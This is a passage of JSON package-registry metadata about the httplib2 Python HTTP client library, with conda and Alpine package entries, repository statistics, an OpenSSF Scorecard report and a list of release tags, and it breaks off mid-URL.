b2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T03:48:32.204Z","dependent_packages_count":21,"downloads":4963654,"downloads_period":"total","dependent_repos_count":53,"rankings":{"downloads":null,"dependent_repos_count":4.87549278906133,"dependent_packages_count":3.093966764808623,"stargazers_count":18.034832077448975,"forks_count":13.039572832975695,"docker_downloads_count":null,"average":9.760966116073655},"purl":"pkg:conda/httplib2?repository_url=https://conda-forge.org","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/conda/httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/conda/httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/conda/httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages/httplib2/codemeta","maintainers":[],"registry":{"name":"conda-forge.org","url":"https://conda-forge.org","ecosystem":"conda","default":false,"packages_count":20636,"maintainers_count":0,"namespaces_count":0,"keywords_count":13549,"github":"conda-forge","metadata":{"kind":"conda-forge","key":"CondaForge","api":"https://conda.anaconda.org","funded_packages_count":2349},"icon_url":"https://github.com/conda-forge.png","created_at":"2022-10-03T15:37:08.743Z","updated_at":"2026-08-25T05:07:08.746Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/conda-forge.org/namespaces"}},{"id":6064088,"name":"py3-httplib2","ecosystem":"alpine","description":"Python HTTP client library (for python3)","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2019-05-05T17:04:35.000Z","latest_release_published_at":"2019-05-05T17:04:35.000Z","latest_release_number":"0.12.1-r1","last_synced_at":"2026-03-08T18:56:37.202Z","created_at":"2023-01-31T19:14:03.391Z","updated_at":"2026-08-22T03:48:32.351Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.10/main/x86_64/py3-httplib2","install_command":"apk add py3-httplib2","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.